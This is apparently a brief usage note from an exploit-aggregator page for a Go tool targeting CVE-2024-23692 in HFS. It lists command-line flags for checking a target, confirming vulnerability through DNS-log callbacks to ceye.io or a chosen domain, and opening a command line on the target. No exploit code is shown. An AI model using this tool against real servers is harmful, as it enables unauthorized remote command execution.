## https://sploitus.com/exploit?id=CE3B0AC3-96AC-59B0-A761-82C07F3CC4A6
## CVE-2024-23692
#### Usage: go run hfs.go -h

#### go run hfs.go -u http://127.0.0.1

#### go run hfs.go -u http://127.0.0.1 -dns //Default: uses ceye.io (configuration required)
#### go run hfs.go -u http://127.0.0.1 -dns -d abc.cn //Specifies the dnslog

#### go run hfs.go -u http://127.0.0.1 -cmd //Enter the command line

*Tips: DNSLOG detection uses ceye.io by default. To use another server, configure the configuration file in the config.ini directory.*
*Exe not packaged; you can package it yourself.*